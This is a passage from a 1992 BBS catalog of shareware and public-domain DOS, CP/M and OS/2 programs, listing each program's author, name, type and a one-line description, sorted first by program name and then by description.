Comm BBS directory 9600 bps, Int'l +McLean, Ian A2Z User Utility Convert ARC to ZIP +Merckens, Arjen ACD DOS Utility DIR move-to utility, an LCD++ +Hapgood, Chris ALTRNFRN User Utility French keyboard for WordPerfect +Cohen, Ben AMORTAB3 User Utility Loan amortization, Osborne +Volking, Frederick ANIMATOR User Utility Draw animated cartoons, 40x80 pixels +Mefford, Michael ANSICOM DOS Utility Ansi.sys replacement +Coffman, Dewey AREACODE Database Area Code database +Thayer, Don ASTRO User Utility Astronomy program +McGuire, T. ATCLOCK DOS Utility Clock corrector for ATs +Brenner, Steven AUTO-GEN Comm Telix SALT scripts for automating +Buerg, Vern AUTODATE DOS Utility Dater, automatic, for PC/XT re-boots +Walen, Frank AUTOPATH DOS Utility Path enlarger for DOS +Azlan Corp. AZLAN User Utility UNIX Sys V commands for DOS +Johnson, Ernie BADUSER SYSOP Utility PCBoard login door, for Hi/G'bye, etc. +Amer. Lib. Assoc. BANNED Database List of who bans books & which ones +Gottlieb, Larry BANNER User Utility Banner program +Baley, Robert BANNERS User Utility Banner program +Boling, Douglas BCOPY DOS Utility Copy in the background +PCMagazine BENCHMARK Diagnostic Benchmarks and tests and a lot more +Young, Gary BIGBURST CP/M Utility File splitter for floppies +Vick, Ricki (& Focke) BIOSSIG Database BIOS info catalog +Focke, Mike (& Vick) BIOSSIG Diagnostic BIOS info catalog +Quigley, Michael C. BOOTLOG User Utility Logs date/time computer is booted up +Gibson, Bill BOOTTHRU DOS Utility Boot from C ignoring floppy +McNamara, John BOPDIR DOS Utility File deleter, recursive +Maland, Philip BOXES User Utility Box drawing pop-up reference, TSR +Reamy, Bill BUBA User Utility BAT file routines +McNamara, John BUDMAN PCB Utility PCB D/L txt file splitter +Krieg, Mark BULK DBase Utility Sorts .DBF files for bulk mailing +Kaya, Raymond CAL User Utility Calendar, pop-up, scroll + & - +McNamara, John CALLKILL PCB Utility PCB Del oversize caller log +Lee, Patrick CATQWK USER Utility Combine 2 or more QWK files from a BBS +Moon, Ray (after BThomson) CDD DOS Utility Change drive+directory +Christensen, Ward CDTO DOS Utility File finder goes to it +Dunford, Christopher CED V1.0 DOS Utility DOS enhancer with synonym shell, GREAT +Mason, Scott CHGPATH DOS Utility PATH editor doesn't wipe it +Volking, Frederick CHRONOS User Utility Calculator for time & dates, 14 jobs +Williams, Dave CLEARFNT User Utility Large typeface for visually impaired +Sawada, Dr. Masaaki CNFLICT DOS Utility Int tracer to identify conflicts +Mefford, Michael CO DOS Utility File manipulator +Mefford, Michael COMPARE User Utility Compares 2 files +Gersback, Jack COMPARE User Utility Compares 2 files +Bellard, Fabrice COMTOEXE User Utility Convert COM files to EXE files + + +19-Jun-92 9 + + + +Author Program Type Description +=============================================================================================== +McKay, Byron CONFIGUR CP/M Utility Modem7 for Osborne +Core Int'l CORETEST Diagnostic Benchmarker for harddrives +Lyngvig, Roland COREVIEW PC Utility PC memory scan and search +Graham, Keith CPORT Comm Re-direct I/O Ports, TSR +Pemberton, William CPY DOS Utility File manipulator +Kaya, Raymond CRC-M2 User Utility CRC checker, 16 & 32 bit +McMillen, Ken (& Fried) CSCV Diagnostic Diagnostics for PCs +Fried, A. (& McMillen) CSCV Diagnostic Diagnostics, DOS +Wilson, Richard (& Simon) CTRLALT User Utility Desk utilities, nice +Simon, Barry (& Wilson) CTRLALT User Utility Desk utilities, nice +Lindell, Michael CURVEFIT User Utility Geometry utility +Davis, Stephen R. CUTPASTE User Utility Screen saver +Roper, David CUTZIT DOS Utility Cut long files for floppy storage +Linhart, Steve CVTFON Comm Convert FON files to many comm formats +Teknowledge CWINE Database+ Wine guide, California only +McNamara, John DATEKILL User Utility Del log or file after some date +Morgan, Bill DAYS User Utility Count the days between two dates +Leon, Stephen DB3MNGER User Utility Property manager for DB3 +Kaya, Raymond DBV USER Utility View DBase files w/o having DBase +Esherick, Peter DC User Utility File directory, manipulator +Lalonde, Jean DDUP DOS Utility Duplicate file finder, manager +Dakon, Peter DEMON Comm Modem guide for USR 1440 & dual std. +Byrne, Richard DEZIP User Utility Compressed programs command shell +Weicker, Reinhold DHRYSTONE Diagnostic Benchmarker +Riff, Joan DIAGS Diagnostic Diagnosis of DOS & hardware +Schenkel, Jim DIALER CP/M Utility Auto-dialer & phonebook +Schlafly, Roger DIALTHAT Comm Dial on-screen phone numbers, TSR +Kaya, Raymond DIRDEL User Utility DIR delete, whole subs inclu HRS files +ZIFF Communications Co. DIRMAGIC DOS Utility File handler +Kaya, Raymond DIRX User Utility Shell to manage PKLITE/LZEXE/DIET/etc. +Morrison, Karson (Caleb) DISKOVER User Utility Labeler for diskettes +Johnson, K. Scott DISTANCE User Utility Measure distances on Earth, any 2 pts +Farley, Tim DJUST User Utility Double justify for 40/80 col. screens +Gazelle Systems, DMATEST Diagnostic Tests the DMA chip +Vostreys, Robert DOORUSER User Utility Counter for door accesses +Kuhn, Donavon (& Niedfeldt) DOSMODEM Comm Modem command manager, DTR\AT +Niedfeldt, Jon (& Kuhn) DOSMODEM Comm Manage DTR\AT commands +Grunin, Eric DOUBLEDIR,DD DOS Utility Show 2 directories side by side +McGreggor Jr, James DPATH DOS Utility Path datafiles in DOS +Mead, Barry DRMHOUSE User Utility House plan designer +Unknown, Sergio DRVTYPES Database Harddrive types info file +Montgomery, Bob DS DOS Utility Directory structure viewer +Gans, Eric DSIZ User Utility Directory lister/printer +Madison, W. G. DSKBUF Diagnostic Test buffers for optimum setting +Dunford, Christopher DSKMON DOS Utility Harddrive access monitor +Christensen, Ward DU CP/M Utility Diskette manipulator +Vostreys, Robert DUMPANSI User Utility Strip ANSI from files +MacDonald, Michael DUP USER Utility Duplicate file finder for Robocomm +Meyers, Mike DWSTMP PCB Utility Draw table of multi-events, colors +Bovee, Bill EDENV DOS Utility Environment editor for DOS +McNamara, John EDITPTH DOS Utility Edit DOS PATH +Kellen, Tom EFREE DOS Utility Report environment size and free bytes + + +19-Jun-92 10 + + + +Author Program Type Description +=============================================================================================== +Eyer, Bob ELIM DOS Utility DEL filenames DOS can't cope with +Laneville, Etienne ELIST Comm BBS list with ratings, Int'l +Burdsal, Charles ERSEBK User Utility DEL globally by Ext. (can do hidden)_ +Gerada, Ian EVENT PCB Utility Control the PCB Event. Easy install +VanderPutten, Elizabeth Anne EVIEW User Utility DBASE files viewer without using dBASE +Keeves, Andy EXZIP User Utility Packet checker & re-packer, Scans +Keeves, Andy EXZTEST Sysop Utility Verify uploaded files on PCB 14.5 +Smith, Rich EZDIALER Comm TELIX 3.0 dialing scripts for PCP +Rabinowitz, Chip F11F12 DOS Utility Key programmer for the F-11 & F-12 keys +Patenaude, R (& Somerson) FASTATKB User Utility Keyboard speed up for ATs +Somerson, P (& Patenaude) FASTATKB User Utility Keyboard speed up for ATs +Sheppard, Joseph FASTHST Comm Modem config, USR, high speed +Dunford, Christopher FAT Diagnostic FAT lister shows cluster usage +Hartigan, Bruce FCCSTUDY User Utility Ham license Q&A inter-active tester +Hockstatter, Christoph FDFORMAT DOS Utility Format command enhancement, complete +Sydex FDRPM Diagnostic Test floppys to show RPM +Volking, Frederick FFA User Utility File finder, with options +Williams, Don FFF User Utility FastFileFind can also search packets +Kaya, Raymond FFIND User Utility File finder finds all, wildcards ok +Dunford, Christopher FGREP User Utility Text search, fast, SHARE compatible +Graham, Keith FILEFINDER User Utility File handler +Dunford, Christopher FILER2 DOS Utility File manipulator +Ritchey, J.P. FILES DOS Utility Add more FILES to the env. in HIMEM +Hoff, Irvin M. FIND CP/M Utility String searcher +McMains, Larry FINDIT DOS Utility File finder +Kaya, Raymond FIX User Utility Patcher, file editor. Binary w/search +Blue Skies, Inc FIZZ DOS Utility File manipulator-Dos enhancer +Willoughby, Bob FKEYS User Utility FKeys programmer (not F11/F12 though) +Turton, Paul FLMK & FLUSH DOS Utility TSR managers +Graham, Keith FMAC User Utility Readmac file viewer +Feldesman, Marc FP User Utility Financial Partner fin. management +Zimmer, Tom FPC Programming FORTH system for IBM PCs +Tyler, Bert FRACTINT User Utility Fractal generator, Mandelbrot/Julia +Cagley, Mark FREE Diagnostic Disk usage report, disk info +Buerg, Vern FV DOS Utility View filenames\attributes in packets +Kellner, Hans GATEWAY Comm COM port control utility +Day, Mark HARDPARK DOS Utility Park Hdrives & tell what track +McNamara, John HCOMP User Utility Strip unwanted lines from files +Kuhman, Robert C. HEADLINE CP/M Utility Printer utility +Inkle', David HELP User Utility Help on-line for OCs +Tutelman, Dave HERCBIOS DOS Utility Speed writing for text\graphics +Brown, Reid HERCULES Programming Programming aids +Mathews III, Ernest HIDEDIR DOS Utility Hide-unhide-find files & DIRs +PC Tech Journal HLBENCH, etc. Diagnostic Benchmarks and diags +Wilcox, Ken HOLDBOOT User Utility BAT file pauser, choose options +Horn, Daniel HOST3 Comm Telix 3.xx expanded HOST mode +McNamara, John HOTDOG PCB Utility PCB user maintenance to do it all +McNamara, John HOWLONG User Utility Time program execution +Moore, Dan HST20 Comm Qmodem USR\HST set-up script +McNamara, John HSTUFF PCB Utility PCB file and stats report +Lou, John IBMTAB Database IBM AT technical reference tables +Bevilacqua, Paolo IDEDIAG Diagnostic Display IDE drive characteristics + + +19-Jun-92 11 + + + +Author Program Type Description +=============================================================================================== +Rossmann, Andrew INFOPLUS Diagnostic System info with much more, like SYSID +Boyd, David IRSUSER PCB Utility Audit users to see who expired +Dargie, Joe IRSUSER PCB Utility Audit users to see who expired +Johnson, Richard JMODEM Comm Transfer protocol +Volking, Frederick JULIAN User Utility Date converter, Julian-Gregorian +Volking, Frederick JUMPDIR User Utility DOS's CHDIR command replacement +Niswonger, Mark JUSTCALLED Sysop Utility PCB callers told who prior caller was +Gildrech, Skip KBFIX DOS Utility Keyboard utilities +Petzold, Charles KEY-FAKE User Utility Keystrokes inserted automatically +McNamara, John KILLDIR DOS Utility Kill a DIR and its contents +Goebel, Amy KILLDIR DOS Utility Kill directories and files +Davis, Christopher KITSMENU User Utility Menu program +Klee, Albert KLEE UTILS User Utility Word processing & other utilities +Vostreys, Robert LANG User Utility ProDoor utility +Ledbetter, Keith LCD DOS Utility Move to any sub-dir anywhere, fast +Yoshizaki, Haruyasu LHARC Compression Compression system like ZIP, ARC +Evers, Dave LIBMGR Programming QB library manager +Anon LIST (conv) OS/2 Utility File Reader, ported from PD program +Ottersbach, Larry LISTCNFG User Utility Patch Buerg's LIST for dialing, etc. +Barry, Rey LOWMINT User Utility Coin mintages in Lotus graphs, US +Petrakis, Peter LZESHL User Utility Lzexe shell up through Ver. 91 +Bellard, Fabrice LZEXE User Utility Compress and still run EXE files +McNamara, John MACKILL DOS Utility Search for files & kill them +Kikkonen, Kim MAPMEN Diagnostic Memory map viewer +Kochaniak, Greg MATHFC User Utility Math expression calculator +Clowers, Robert MATHGRAF User Utility Math equation grapher +Martin, C. F. MEMSCAN DIAGS Utility Watch memory during program execution +Nagel Jr., Mike MENUGEN User Utility Menu program +Fowler, Ron MEX CP/M Utility Communications program +Whitney, Kenneth MICROPRINT Printer Printer enhancer +Dunford, Christopher MJOG User Utility Appointment minder, date filer +Fowler, Ron MLOAD CP/M Utility Program loader +Software Fdn. MM20B30 PROG Utility OS/2 Compiler +Christensen, Ward MODEM CP/M Utility Communications program for the masses +Zeiger, Mark M. (& Mills) MODEM CP/M Utility Comm prog doc co-writer +Mills, James K. (& Zeiger) MODEM CP/M Utility Comm program docs +Slaughter, D. MODEM7 CP/M Utility Comm prog docs, Osborne version +Sloop Software MORECON USER Utility Control all manner of WINDOW defaults +Haupt, Lewis MOVE DOS Utility File manupulator +Vostreys, Robert MSG2TXT User Utility PCB messagebase, dump to txt files +Winkel, Rich MSPOOL User Utility Spooler for up to 4 printers at once +Chapman, Mike MTEST Diagnostic Mouse tester +Farley, Tim MXO-KP User Utility Kaypro MEX ovr, supports 2 modems +Kegel, Daniel NANSI DOS Utility Ansi substitute +Nat'l Bureau of Standards NBSTIME User Utility Clock setter from the NBS (NIST) +Miller, Daniel D. NDIR DOS Utility DIR lister with superior color control +Unknown NETDRIVES DOS Utility Describe all drives on the network +Pulliam, John NEW User Utility DIR what's new, w/many options +Haff, Gordon NEWDATE User Utility Redate file to today's date +Jelenc, Pierre NEWPS Printer Printer FFeed and LPT re-direct, TSR +Lee, Dennis NMI Diagnostic Memory checker, TSR +Almy, Tom NNANSI DOS Utility So far the fastest ANSI replacement + + +19-Jun-92 12 + + + +Author Program Type Description +=============================================================================================== +Johns, Ray NOBIT User Utility WS file editor, remove bit 7 +Rand, Dave NSWEEP CP/M Utility File manipulator +Parisien, Harry OFFLINE USER Utility Off-line reader for Mail Doors +Eldridge, E. OHMSLAW User Utility Calculator +Digital Transit ONE TO ONE Comm Communications package +Softsource ORIGAMI Database Instructions +McNamara, John ORIGIN PCB Utility PCB text search Door +Gilliland, Jim OS2COMM OS/2 Utility OS/2 modem program +Rubenstein, Michael M. OTERM CP/M Utility Comm program +Lansdale, Robert OTERM WINDOW CP/M Utility Comm program, Osborne +Morey, R. Hunter OTSETUP CP/M Utility Comm program setup +DeBuck, Cam OUTCOME BBS Utility PCB14.5 Send a message out the comport +Pearson, Jimmy PARASCAN User Utility Sanity Restorer +Doornik, Jurgen PATCH22 USER Utility Patch any file w/o debug, easy +McCall, Caddy PC-LOANS User Utility Loan amortizing program +Smith, Gary w/Kennon PCCZmodem Comm Zmodem implementation +Kennon, Drue w/Smith PCCZmodem Comm Zmodem implementation +Ying, Eugene PCPG User Utility Graphic symbols collection +Garfinkle, Scott PDISK DOS Utility Harddrive partitioner +Huffman, Bill PENBOX User Utility Comments in and out of ZIPS +Dunford, Christopher PMAP Diagnostic Map mem, HIMEM, files, buffers, drivers +Herring, Mark POE Comm Outside protocols for comm programs +Turbopower Software POPDOS DOS Utility TSR allows drop to DOS from any program +Morris, Aaron P. PORTABLE Database Index of Osborne's "Portable Companion" +Duet, Bob PRINT Printer Printer control commands for C-ITOH +Vostreys, Robert PRO2MSG User Utility Copy ARC/ZIP to PCB messagebase +Fowler, Ron PROLINK CP/M Utility Z-80 Linker +Various Authors PROMPT User Utility PROMPTS and screen setups w/character +Smith, Sam PROXZIP User Utility Copy unzipped files between Zips +Brothers, Hardin PRSET User Utility Printer command setter, TSR +Sydex PRUNE DOS Utility Clean out 'empty' file headroom +Shields, Kelvin PYRO User Utility EGA fireworks display +Vostreys, Robert Q2PCB14 User Utility PCB and QBBS utility +Farley, Tim QCT User Utility Compilers run inside Qedit +Ehrlich, David QDISK DOS Utility File directory, DOS manipulator +Buerg, Vern QDR DOS Utility Format on 2 drives & such +Keller, Dale QHELP USER Utility Qedit quick help shell +Hoffman, Robert QPACK Sysop Utility Qmail Deluxe packer shell +Fleig, Tony QWIKKEY CP/M Utility Keyboard re-definition +Foy, Jeffery QWKTXT USER Utility Convert maildoor QWK file file to ASCII +McCullough, Clifford RAMHAM Diagnostic RAM chip checker +Smith, Christopher RAMIT DOS Utility Hdisk access speed-up +Weisz, Jim RAMTEST Diagnostic RAM chip checker +Mack, Tom RBBS Comm BBS software +Shields, Bill RC USER Utility Del (e-o-f) and (cr) from text files +Christensen, Ward RE-SOURCE CP/M Utility Dis-assembler +Herring, Mark READCOM BBS Utility Door programming tool +Wilkerson, Clarence READCPM User Utility Read Zenith CP/M disks in PC-DOS +Barry, Rey REAGAN Database Book of Reagan jokes +Kihlken, Tom RECORDER User Utility File access monitor +Bjorklund, Roland RECOVER CP/M Utility File recoverer +Barnes, Jefferey A. REGAIN DOS Utility CED-alike & more; change key functions + + +19-Jun-92 13 + + + +Author Program Type Description +=============================================================================================== +Gans, Eric RESPRO DOS Utility TSR remover +Almy, Tom RESTART User Utility System configuration management +Mefford, Michael RN DOS Utility File manipulator +Sink Jr, Robert ROINFO Database Setup info for harddrives +Beers, William RS232 Comm Modem lights on-screen +Keber, Bob RTRIM User Utility Del blank lines, etc. in pompous docs +Kaya, Raymond RVIEW User Utility Shell for ARC/ZIP/LZH/LZS/PAK/ZOO+lites +Gruen, Andreas RX WIN3 Utility Reverse resource compiler for WIN3 +Steele, John SAVE CP/M Utility File recovery for lost files +Thomson, Jim SCAN Diagnostic System info scanner, very detailed +Pierson, Jacques SDF DOS Utility Disk formatter, fast +Henderson, Thom SEALINK V1.2 Comm Transfer protocol +Lalonde, Jean SEARCHIN User Utility File searcher +Berg-Sonne, Anker SEDT EDITOR OS/2 Utility Text ed for OS/2, Atari, DEC, DOS, etc. +Housh, Rick SEEMEM DOS Utility Mem info display, better than DOS5 +Leirer, Von SELECT-A-COLL Database Srch college list by weighted criteria +Simon, Barry (& Rumsey) SEND DOS Utility DOS ECHO enhancer +Rumsey, Howard (& Simon) SEND DOS Utility DOS ECHO enhancer +Herring, Mark SENDCOM BBS Utility Door programming tool +Bly, Vincent SETPRN Printer Printer parameter reset +Lewis, Dan SETVAR DOS Utility Sets environment variables +Van den Brug, Arend SHOW Diagnostic Display information about the PC +Crown Software SHOWME Diagnostic System equipment lister, net capable +Byrne, R.P. SHRINK User Utility Archiver in TP compatible with PKZIP +Burtner, Carl SILENCE DOS Utility Silence beepy programs +Kihlken, Tom SNIPPER User Utility Capture some or all of 1 screen, TSR +Miller, Craig S. SPHM COMM Utility Telix SALT programming manl, Hypertext +Dingacci, M. SPLIT User Utility File splitter to fit floppies +Nault, Mike SPLITTER User Utility Split long files +Vostreys, Robert SQ2MSG User Utility PCB messagebase script files +Kohtala, Marko SRDISK DOS Utility RAMdisk for XMS memory, re-Sizeable +Wang, Kevin SST Diagnostic Test for PC system speed +Ferris, Lane STAYRES Programmer TSR code, generic +Andrews, Tony STEVIE OS/2 Utility Text ed like vi for OS/2, atari, etc. +Brown, Ken STRIPZIP DOS Utility Strip out comments in ZIPs +Del Vecchio, Marty SWAP DOS Utility Himem swap lets a prog run other progs +Buerg, Vern SWAPNAME User Utility Swap two file names. All-time great. +George, Robert SWEEP USER Utility Commands executed across partitions +Brunner, Andy SYSACT OS/2 Utility System perf. monitor +Grant, Steve SYSID Diagnostic System information, 12 screens +Microsoft Corp. T2C Programming Convert Turbo Pascal to CBasic +Tortorelli, Tony TAGLINES User Utility Monitor conference usage, taglines +Nieves, David TAGMASTER User Utility Tagline manager for QMDeluxe/EZ +Nieves, David TAGSTEAL User Utility Tagline stealer for QMDeluxe +Teasley, Charles TAIL-CT User Utility Pass parameters from a BAT +Collins, Chris TCCLIB2 Programmer Turbo C function library. Ver2 is free +Baldwin, Dave TDEBUG Programming Turbo Pascal de-bugger +Standley, Jim TDSNAP User Utility Screen capture +McKay, Byron TELL CP/M Utility Memory location display +Taylor, Scott TESTNET Diagnostic Network I/O performance tester +Anderson, Brad THE MENU User Utility Menu system can handle 1400 commands +Volking, Frederick TIMECARD User Utility Calculate timecards + + +19-Jun-92 14 + + + +Author Program Type Description +=============================================================================================== +Brown, Eric TIMEOUT User Utility WAIT program for BAT files +Petrakis, Peter TIMESET User Utility Clock set to USN Observatory time +Volking, Frederick TINYGRAB User Utility Screen capture, TSR color/mono +Volking, Frederick TINYMOD User Utility Screen capture, edit output +De Haan, Bill TLXSORT User Utility Telix 2.xx phone number sorter +Tauck, Eric TODDY User Utility Scroll-back using 0AH, command line +Brenner, Aaron TODIR DOS Utility Directory quick change +Mefford, Michael TOUCH DOS Utility Redate DOS file date/time +Petersen, Keith TO\FROMHARD CP/M Utility File handler +Foley, Brian TPE Programming TurboPower Software programmer's editor +Vostreys, Robert TRANSLAT User Utility Translate IBM extended to ASCII +Philippot, Patrick TRAP DOS Utility Int tracer, PD ver. written by IBM guy +Chrosziel, Udo TRAP DOS Utility Added SETTRAP & more to TRAP Int tracer +Rettig, Tom TRL4CL Programming Clipper Adv. Extended Library +Rettig, Tom TRL4DB Programming Clipper Adv. Programmer's Library +Kikkonen, Kim TSR UTILS DOS Utility DOS memory manager programs, GOOD +Rock n Roll BBS TVBOARDS Database BBS directory for journalism boards +Graham, Keith TXT2COM User Utility Convert a textfile to a COM file +Vostreys, Robert TXT2MSG User Utility PCB messagebase txt file dump +Cotton, Gene UNERAIS CP/M Utility File recovery for erased files +Kou UNLZEXE User Utility Un-compress LZEXE-squeezed files +Christensen, Ward UNNONDOS DOS Utility Patch byte #1 of FAT to F8, a cure +Bellard, Fabrice UNPACK User Utility Unpack Microsoft EXEPACK files +Smith, Sam UNZIP User Utility Zipfile extractor, small & portable +Frierson, Meade (editor) USBBS Comm Bulletin Board list +Olympia, Pete (founder) USBBS Comm Bulletin Board list +Haley, James USE DOS Utility Path changer, add and delete DIRS +Brenner, Aaron VHARD DOS Utility Device driver makes floppies look hard +Bridges, John VIDSPEED Diagnostic Benchmarker for hardware +Holden, Ted VMUSIC User Utility Music in 3 parts on a PC +Decepida, Andy VOLCHK Diagnostic CHKDSK jr. that can report all drives +Brown, Ken WAIT4LAN Diagnostic Network start-up utility +Graham, Keith WAKEUP User Utility Clock with alarm +Lazo, Charles WASO User Utility Scrollback TSR using EMS +Petrakis, Peter WHATPORT Diagnostic I/O ports & interrupts reporter +Ledbetter, Keith WHEREIS DOS Utility File search utility +Behman, S. B. WHIZ User Utility File finder, very fast +Evers, Dave WINDOW TOOLS Programming QB toolbox routines +Lloyd, Robert WORLD User Utility View the Earth +Cox, Walter WTERM Comm Comm program for BBSs, bare bones +SEA XARC User Utility ARC PLUS and ARC files extractor +Hoff, Irvin M. XCAT CP/M Utility Catalog program, diskettes +Ledbetter, Keith XCOM User Utility Compress small EXE/COM/BAT files +Stearman, Colin XEQ DOS Utility Compress small EXE/COM/BAT files +Petersen, Keith XMODEM ADD-IN CP/M Utility Added Hayes & serial to XModem +Hansknecht, Paul XMODEM CRC CP/M Utility Comm program +Mahr, John XMODEM UPDATE CP/M Utility Comm program +Monroe, Gerald XMSCHK DOS Utility Mem chkr for EXT mem only if XMS Drvr +Sittler, Paul YEARCAL User Utility Calenders and schedule creator, good +Banning, Noah YSNOOP User Utility Password security masquerading as DOS +Hanlin, Thomas ZANSI DOS Utility Ansi and Nansi substitute +Conn, Richard ZCPR3 CP/M Utility Replacement/enhancer for CP/M + + +19-Jun-92 15 + + + +Author Program Type Description +=============================================================================================== +Hanlin, Tom ZDEL User Utility File handler +Lazarus, M ZENO DOS Utility Screen write speed utility +Tansky, Ron (upgrader) ZENO DOS Utility Screen write speed utility +Kaya, Raymond ZFV User Utility ZIP examiner, very detailed, unique +Genusa, Stephen ZIPSTAMP User Utility Redate Zipfile to latest file inside +Buerg, Vern ZIPV User Utility Views filenames & comments in a ZIP +Bordelon, Les ZSD DOS Utility Directory sorter, manipulator + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +19-Jun-92 16 + + + +=============================================================================================== +SORTED BY DESCRIPTION + +Author Program Type Description +=============================================================================================== + +Philippot, Patrick 4DOS24h DOS Utility 4DOS Replacement for DOS error handling +SEA XARC User Utility ARC PLUS and ARC files extractor +Ritchey, J.P. FILES DOS Utility Add more FILES to the env. in HIMEM +Petersen, Keith XMODEM ADD-IN CP/M Utility Added Hayes & serial to XModem +Chrosziel, Udo TRAP DOS Utility Added SETTRAP & more to TRAP Int tracer +Hanlin, Thomas ZANSI DOS Utility Ansi and Nansi substitute +Kegel, Daniel NANSI DOS Utility Ansi substitute +Mefford, Michael ANSICOM DOS Utility Ansi.sys replacement +Dunford, Christopher MJOG User Utility Appointment minder, date filer +Byrne, R.P. SHRINK User Utility Archiver in TP compatible with PKZIP +Coffman, Dewey AREACODE Database Area Code database +Thayer, Don ASTRO User Utility Astronomy program +Boyd, David IRSUSER PCB Utility Audit users to see who expired +Dargie, Joe IRSUSER PCB Utility Audit users to see who expired +Schenkel, Jim DIALER CP/M Utility Auto-dialer & phonebook +Wilcox, Ken HOLDBOOT User Utility BAT file pauser, choose options +Reamy, Bill BUBA User Utility BAT file routines +Montgomery, Mark 96BB Comm BBS directory 9600 bps, Int'l +Rock n Roll BBS TVBOARDS Database BBS directory for journalism boards +Laneville, Etienne ELIST Comm BBS list with ratings, Int'l +Mack, Tom RBBS Comm BBS software +Focke, Mike (& Vick) BIOSSIG Diagnostic BIOS info catalog +Vick, Ricki (& Focke) BIOSSIG Database BIOS info catalog +Gottlieb, Larry BANNER User Utility Banner program +Baley, Robert BANNERS User Utility Banner program +Weicker, Reinhold DHRYSTONE Diagnostic Benchmarker +Core Int'l CORETEST Diagnostic Benchmarker for harddrives +Bridges, John VIDSPEED Diagnostic Benchmarker for hardware +PC Tech Journal HLBENCH, etc. Diagnostic Benchmarks and diags +PCMagazine BENCHMARK Diagnostic Benchmarks and tests and a lot more +Barry, Rey REAGAN Database Book of Reagan jokes +Gibson, Bill BOOTTHRU DOS Utility Boot from C ignoring floppy +Maland, Philip BOXES User Utility Box drawing pop-up reference, TSR +Olympia, Pete (founder) USBBS Comm Bulletin Board list +Frierson, Meade (editor) USBBS Comm Bulletin Board list +Barnes, Jefferey A. REGAIN DOS Utility CED-alike & more; change key functions +Decepida, Andy VOLCHK Diagnostic CHKDSK jr. that can report all drives +Kellner, Hans GATEWAY Comm COM port control utility +Kaya, Raymond CRC-M2 User Utility CRC checker, 16 & 32 bit +Volking, Frederick TIMECARD User Utility Calculate timecards +Eldridge, E. OHMSLAW User Utility Calculator +Volking, Frederick CHRONOS User Utility Calculator for time & dates, 14 jobs +Kaya, Raymond CAL User Utility Calendar, pop-up, scroll + & - +Sittler, Paul YEARCAL User Utility Calenders and schedule creator, good +Kihlken, Tom SNIPPER User Utility Capture some or all of 1 screen, TSR +Hoff, Irvin M. XCAT CP/M Utility Catalog program, diskettes + + +19-Jun-92 17 + + + +Author Program Type Description +=============================================================================================== +Moon, Ray (after BThomson) CDD DOS Utility Change drive+directory +Sydex PRUNE DOS Utility Clean out 'empty' file headroom +Rettig, Tom TRL4CL Programming Clipper Adv. Extended Library +Rettig, Tom TRL4DB Programming Clipper Adv. Programmer's Library +McGuire, T. ATCLOCK DOS Utility Clock corrector for ATs +Petrakis, Peter TIMESET User Utility Clock set to USN Observatory time +Nat'l Bureau of Standards NBSTIME User Utility Clock setter from the NBS (NIST) +Graham, Keith WAKEUP User Utility Clock with alarm +Barry, Rey LOWMINT User Utility Coin mintages in Lotus graphs, US +Lee, Patrick CATQWK USER Utility Combine 2 or more QWK files from a BBS +Zeiger, Mark M. (& Mills) MODEM CP/M Utility Comm prog doc co-writer +Slaughter, D. MODEM7 CP/M Utility Comm prog docs, Osborne version +Rubenstein, Michael M. OTERM CP/M Utility Comm program +Hansknecht, Paul XMODEM CRC CP/M Utility Comm program +Mahr, John XMODEM UPDATE CP/M Utility Comm program +Mills, James K. (& Zeiger) MODEM CP/M Utility Comm program docs +Cox, Walter WTERM Comm Comm program for BBSs, bare bones +Morey, R. Hunter OTSETUP CP/M Utility Comm program setup +Lansdale, Robert OTERM WINDOW CP/M Utility Comm program, Osborne +George, Robert SWEEP USER Utility Commands executed across partitions +Huffman, Bill PENBOX User Utility Comments in and out of ZIPS +Digital Transit ONE TO ONE Comm Communications package +Fowler, Ron MEX CP/M Utility Communications program +Christensen, Ward MODEM CP/M Utility Communications program for the masses +Gersback, Jack COMPARE User Utility Compares 2 files +Mefford, Michael COMPARE User Utility Compares 2 files +Farley, Tim QCT User Utility Compilers run inside Qedit +Bellard, Fabrice LZEXE User Utility Compress and still run EXE files +Ledbetter, Keith XCOM User Utility Compress small EXE/COM/BAT files +Stearman, Colin XEQ DOS Utility Compress small EXE/COM/BAT files +Byrne, Richard DEZIP User Utility Compressed programs command shell +Yoshizaki, Haruyasu LHARC Compression Compression system like ZIP, ARC +Sloop Software MORECON USER Utility Control all manner of WINDOW defaults +Gerada, Ian EVENT PCB Utility Control the PCB Event. Easy install +McLean, Ian A2Z User Utility Convert ARC to ZIP +Bellard, Fabrice COMTOEXE User Utility Convert COM files to EXE files +Linhart, Steve CVTFON Comm Convert FON files to many comm formats +Microsoft Corp. T2C Programming Convert Turbo Pascal to CBasic +Graham, Keith TXT2COM User Utility Convert a textfile to a COM file +Foy, Jeffery QWKTXT USER Utility Convert maildoor QWK file file to ASCII +Vostreys, Robert PRO2MSG User Utility Copy ARC/ZIP to PCB messagebase +Boling, Douglas BCOPY DOS Utility Copy in the background +Smith, Sam PROXZIP User Utility Copy unzipped files between Zips +Morgan, Bill DAYS User Utility Count the days between two dates +Vostreys, Robert DOORUSER User Utility Counter for door accesses +Roper, David CUTZIT DOS Utility Cut long files for floppy storage +VanderPutten, Elizabeth Anne EVIEW User Utility DBASE files viewer without using dBASE +Eyer, Bob ELIM DOS Utility DEL filenames DOS can't cope with +Burdsal, Charles ERSEBK User Utility DEL globally by Ext. (can do hidden)_ +Kaya, Raymond DIRDEL User Utility DIR delete, whole subs inclu HRS files +Miller, Daniel D. NDIR DOS Utility DIR lister with superior color control +Merckens, Arjen ACD DOS Utility DIR move-to utility, an LCD++ + + +19-Jun-92 18 + + + +Author Program Type Description +=============================================================================================== +Pulliam, John NEW User Utility DIR what's new, w/many options +Simon, Barry (& Rumsey) SEND DOS Utility DOS ECHO enhancer +Rumsey, Howard (& Simon) SEND DOS Utility DOS ECHO enhancer +Dunford, Christopher CED V1.0 DOS Utility DOS enhancer with synonym shell, GREAT +Kikkonen, Kim TSR UTILS DOS Utility DOS memory manager programs, GOOD +Volking, Frederick JUMPDIR User Utility DOS's CHDIR command replacement +Volking, Frederick JULIAN User Utility Date converter, Julian-Gregorian +Buerg, Vern AUTODATE DOS Utility Dater, automatic, for PC/XT re-boots +Shields, Bill RC USER Utility Del (e-o-f) and (cr) from text files +Keber, Bob RTRIM User Utility Del blank lines, etc. in pompous docs +McNamara, John DATEKILL User Utility Del log or file after some date +Unknown NETDRIVES DOS Utility Describe all drives on the network +Simon, Barry (& Wilson) CTRLALT User Utility Desk utilities, nice +Wilson, Richard (& Simon) CTRLALT User Utility Desk 